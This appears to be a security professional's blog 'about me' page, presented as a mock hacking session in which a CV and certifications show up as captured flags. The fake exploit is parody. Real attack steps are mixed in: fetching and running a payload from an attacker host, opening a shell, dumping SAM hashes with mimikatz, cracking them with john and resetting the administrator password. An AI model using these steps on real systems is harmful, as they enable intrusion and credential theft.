System is starting up!
Loading up things...
###### LOADING! #######
CPU warm-up......[ OK ]
GPU warm-up......[ OK ]
Int. RAM.........[ OK ]
Int. HD0001......[ OK ]
Int. HD0002......[ OK ]
Int. LUN00014....[ OK ]
Int. LUN00015....[ OK ]
Int. settings....[ OK ]
Connecting TOR...[ OK ]
Proxy chains.....[ OK ]
Secret stuff.....[ OK ]
Loading GUI......[ OK ]
Randomizing......[ OK ]
Completing.......[ OK ]
##### COMPLETED! #####
┌──(kali㉿kali)-[~] whoami
kali
└─$ hostname h4x
└─$ uptime 00:01:09
└─$ pwd /home/kali
└─$ cd /home/Henrik Parkkinen
└─$ su Henrik Parkkinen
Password:
└─$ whoami
Henrik Parkkinen
└─$ whoami 2>/dev/null > 3v1lrpc.txt
└─$ gcc 3v1lrpc.txt -o 3v1lrpc.exe
└─$ python3 -m http.server 443
└─$ nc [TARGET IP] 1337
└─$ 3vil$h3ll:>
Connected to target machine!
#CONNECTION
#TO
#EVIL
#AND
#SNEAKY
#BACKDOOR
#SUCCESSFULLY
#ESTABLISHED!
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> /bin/bash -i
└─$ 3vil$h3ll:> whoami
NT/Guest
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> wget https://h4x/3v1lrpc.exe
└─$ 3vil$h3ll:> chmod +x 3v1lrpc.exe
└─$ 3vil$h3ll:> ./3v1lrpc.exe
##################################
###########3v1lrpc.exe############
##################################
[loading*] 3v1lrpc.exe ...
[loading completed*]
Set Options:
rports: [*]
rhosts: [*]
payload: [*]
lhost: [127.0.0.1]
aux: [nc]
eternal blue: [True]
Run exploit: Y
[processing*]
[payload initiated*]
[exploit checking*]
[exploit running*]
-----------------------------------
[PAYLOAD BUFFER]
-----------------------------------
<<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>>
.....-=$[HACKING ONGOING]$=-.....
WARNING!
APESHIT UNLEASHED ON ALL PORTS
[RPC Exploitations Ongoing*]
...Time to drink coffee...
...Guessing random ports...
...Shooting 3v1l payloads...
...#65355 is the answer...
...GL HF GG...
...3v1l sh1t...
...<VOID>...
<<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>>
-----------------------------------
[/PAYLOAD BUFFER]
-----------------------------------
[exploit*] 100% completed!
[exploit*] successful!
[hidden flag found*]
e1Nob3cgSGVucmlrIFBhcmtraW5lbidzIGZ1bGwgcHJvZmlsZSBieSBleGVjdXRpbmcgbmV0IHVzZXIgSGVucmlrIFBhcmtraW5lbiAvYWxsIGluIGNtZH0=
##################################
###########3v1lrpc.exe############
##################################
└─$ 3vil$h3ll:> base64 -d flag.txt
[REDACTED]
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> shell
└─$"> C:\Windows\System32> whoami
NT/Henrik Parkkinen
└─$"> C:\Windows\System32>
└─$"> C:\Windows\System32>
└─$"> C:\Windows\System32>
└─$ C:\Windows\System32> net user Henrik Parkkinen
#PROFILE
Name: Henrik Parkkinen
Company: Onevinn AB
Country: Sweden
Location: Remote [From Planet Earth]
Language: Swedish, English & Finish
Experience: +20 years
Role: ZybR C:qr1ty g33k
Title: <VOID>
Understands: Digital ecosystem, Emerging technologies, Business Management, Cyber attack & threat landscape, Offensive Security, Defensive Security, Infrastructure, Enterprise & Security Architecture
Background: OffSec, DeffSec, Technical, Hands-on, Management, Leadership, Security Architecture
Strengths: Analytical, Strategic thinking, Team-player, Leader
Communication: All levels. Technical SME's to C-level, Boards & Executives
Presentations skills: Strong, both visual and verbal
Mindset: Pragmatic, Progressive, Self-reflecting & gets sh*t done
Attitude: Positive, Calm & Authentic
H4xing: Kali Linux, Empire & Starkiller, Metasploit, Armitage, Nessus, Hydra, John, Hashcat, gobuster, Burp, ZAP, WireShark, NMAP, dig, OSINT, SQLMAP, Autopsy, Notepad
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32> cd\
└─$ C:\> dir /s "userflag.txt"
Volume in drive C is Local Disk
Volume Serial Number is xxxx-yyyy
Directory of C:\Users\Henrik Parkkinen\Desktop
xxxx-yy-zz 02:49 userflag.txt
1 File(s) 90 bytes
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> cd C:\Users\Henrik Parkkinen\Desktop
└─$ C:\Users\Henrik Parkkinen\Desktop> more userflag.txt
#KNOWLEDGE, EXPERIENCE & EDUCATION [VERBOSE MODE]
#Certifications & Certificates
CISM - ISACA
CISA - ISACA
CRISC - ISACA
CCSK - CSA
eJPT - eLearnSecurity
MCP - MSFT
[OBSOLETE]
MCITP: Ent Admin - MSFT
MCTS - MSFT
MCSE: SEC - MSFT
MCSA: SEC - MSFT
MCSE - MSFT
MCSA - MSFT
#Frameworks & Standards
NIST CFS
CCM CSA
ISO 27001
CIS CSC
ITIL
MITRE ATT&CK
#Cyber & Info Sec skills
Sec Assessments
Sec Auditing
Governance
Cloud Sec
Risk Mgmt
Strategy
Mgmt Consulting
Threat Modelling
Sec Architecture
3rd & Supply Chain Sec
#Assignments & Exp.
CISO
Auditor
Advisor
Architect
Specialist
<Prefix> Leader
<Prefix> Manager
#EDUCATION
The State UNV of New York
International cyber conflicts
Delft UNV of Technology
Cyber security economics
UNV of Washington
Info sec & risk mgmt context
Building an info sec risk mgmt toolkit
Designing & executing info sec starts
Higher Vocational IT Education
Infra, NW, FW, & IT-sec
+multiple vendor courses& lectures
#Leadership & Mgmt EDU
Individual Leadership Dev & Growth
Leading Leaders
Self-leadership
LMI International
Building & Leading Teams
Personal Leadership
Schinkler Management
Building The Winning Team
Focus Consulting
Leadership & Business Mgmt
Vendita
Effective Communication
#Volunteering & Accomplishments
ISACA – SME Review: CRISC RM 7th
ISACA – SME Review: DTEF
#Fun
THM – Top 1% [Global], Top 30 [Sweden]
#Epilogue
Stay Curious. Hack Stuff. Be Creative. Laugh. Improve. Resilience. Together. Protect. Be Cool. Relax. Share Knowledge. Wisdom. G33k. Inspire Others. Authenticity. Think. Positive Mindset. 1337. Chill. Good Vibes. Security. Recon. whoami. Learn. Contemplate. Be Kind.
└─$ C:\Users\Henrik Parkkinen\Desktop> cd\
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> echo coffee break. brb
coffee break. brb
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> dir /s "rootflag.txt"
Volume in drive C is Local Disk
Volume Serial Number is xxxx-yyyy
Directory of C:\Users\Administrator
xxx-yy-zz 04:15 rootflag.txt
1 File(s) 12 bytes
└─$ C:\> cd C:\Users\Administrator
└─$ C:\Users\Administrator> more rootflag.txt
Access Denied
└─$ C:\Users\Administrator> cd C:\Temp
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp> wget https://h4x/mimikatz.exe
└─$ C:\Temp> mimikatz.exe
.#####. mimikatz, "Kiwi"
.## ^ ##.
## / \ ## /* * *
## \ / ## [REDACTED INFO]
'## v ##' [REDACTED WEBSITE]
'#####'
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # lsadump::sam
Domain: [REDACTED]
SysKey: [REDACTED]
Local SID: [REDACTED]
SAMKey: [REDACTED]
RID: [REDACTED]
User: Administrator
Hash NTLM: [REDACTED]
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp> background
└─$ 3vil$h3ll:> john -w=rockyou.txt hash.txt
Done!
The Password is: [REDACTED]
└─$ 3vil$h3ll:> shell
└─$"> C:\Windows\System32> whoami
NT/Henrik Parkkinen
└─$"> C:\Windows\System32> cd\
└─$"> C:\>
└─$"> C:\>
└─$"> C:\>
└─$ C:\> net user administrator [REDACTED]
The command completed successfully
└─$"> C:\> whoami
NT/Administrator
└─$ C:\> cd C:\Users\Administrator
└─$ C:\Users\Administrator> more rootflag.txt
#Top secret message
VGFhYWFhIGRhYWFhYWFhISBZb3UgZm91bmQgbWUgYW5kIG1hbmFnZWQgdG8gZGVjaXBoZXIgbWUuLi5idXQgdGhpcyBpcyBqdXN0IGEgdXNlbGVzcyBjaHVuayBvZiB0ZXh0Li4uYW5kIHRoZXJlIGFyZSBubyBzZWNyZXRzIGhlcmUgKGFzIHlvdSBtYXkgaGF2ZSBmb3VuZCBvdXQgbm934oCmb3IgZXZlbiBwcmlvciB0byB0aGlzIGRlY2lwaGVyaW5nKS4gSWYgeW91IGxpa2UgdGhlIGNvbnRlbnQgSSBwcm9kdWNlLCBmaW5kIGl0IGludGVyZXN0aW5nIGFuZCB0aGluayBpdCBtYXkgYmUgb2YgaW50ZXJlc3QgdG8gb3RoZXJzIEkgd2VsY29tZSB5b3UgdG8gc2hhcmUgYW5kIHNwcmVhZCB0aGUgd29yZCA9KSBBbHNvIGtlZXAgaW4gbWluZCB0aGF0IHRoaXMgbWVzc2FnZSBtYXkgY2hhbmdlIGluIHRoZSBmdXR1cmUsIG5leHQgdGltZSBJIG1pZ2h0IHdyaXRlIHNvbWV0aGluZyBlbHNlICh0aGF0IGlzIHVzZWxlc3Mgb3IgdGVsbCBhIGJhZCBqb2tlIG9yIHN0dWZmIGxpa2UgdGhhdCB3aGljaCBpcyBvbmx5IGZvdW5kIGF0IHRoaXMgcGFydCBvZiB0aGUgcGFnZSkuIE9rLCB0aGF0IHdpbGwgYmUgYWxsIGZvciBub3cuIEJ1dCB3ZSB3aWxsIHNlZSBlYWNoIG90aGVyIGFnYWluIEkgZ3Vlc3MoPykgCi8vSGVucmlrIFBhcmtraW5lbgo=
----------<-¤<=NINJA=>¤->----------
└─$ C:\Users\Administrator> exit
└─$ 3vil$h3ll:> exit
└─$ clear
└─$
└─$
└─$
└─$ exit
└─$ shutdown now
The system is shutting down NOW!
Broadcast message from:
Henrik Parkkinen
Message:
Follow the white rabbit...
Purging history cache....[ OK ]
Deleting temp things.....[ OK ]
Doing funky stuff =).....[ OK ]
LUN00014 unmount.........[ OK ]
LUN00015 unmount.........[ OK ]
Purging virtual memory...[ OK ]
Recycling something......[ OK ]
Stopping http server.....[ OK ]
Stopping all services....[ OK ]
Disconnecting TOR........[ OK ]
Killing all processes....[ OK ]
==== SYSTEM POWERED OFF ====
-
Follow
Following
Already have a WordPress.com account? Log in now.
Henrik Parkkinen 